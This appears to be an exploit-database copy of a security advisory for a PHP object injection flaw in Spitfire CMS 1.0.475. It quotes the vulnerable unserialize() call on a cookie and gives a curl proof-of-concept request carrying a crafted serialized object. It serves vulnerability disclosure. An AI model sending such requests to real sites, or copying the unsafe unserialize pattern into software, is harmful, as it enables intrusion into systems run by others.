Spitfire CMS 1.0.475 PHP Object Injection

CVE Category Price Severity
CVE-2020-28883 CWE-94 $1500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-12-11

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Spitfire CMS 1.0.475 PHP Object Injection
Spitfire CMS 1.0.475 (cms_backup_values) PHP Object Injection

Vendor: Claus Muus
Product web page:
Affected version: 1.0.475

Summary: Spitfire is a system to manage the content of webpages.

Desc: The application is prone to a PHP Object Injection vulnerability
due to the unsafe use of unserialize() function. A potential attacker,
authenticated, could exploit this vulnerability by sending specially
crafted requests to the web application containing malicious serialized

47:  private function status ()
48:  {
49:      $status = array ();
51:      $status['values'] = array ();
52:      $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array ();
77:  public function save ($values)
78:  {
79:      $values = array_merge ($this->status['values'], $values);
80:      setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30);
81:  }

Tested on: nginx

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2022-5720
Advisory URL:



> curl -isk -XPOST \
       -H 'Content-Type: application/x-www-form-urlencoded'
       -H 'Accept: */*'
       -H 'Referer:'
       -H 'Accept-Encoding: gzip, deflate'
       -H 'Accept-Language: en-US,en;q=0.9'
       -H 'Connection: close' \
       -H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \
       --data 'action=save&&value=1'
      #--data 'action=save&&value[files]={}'

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.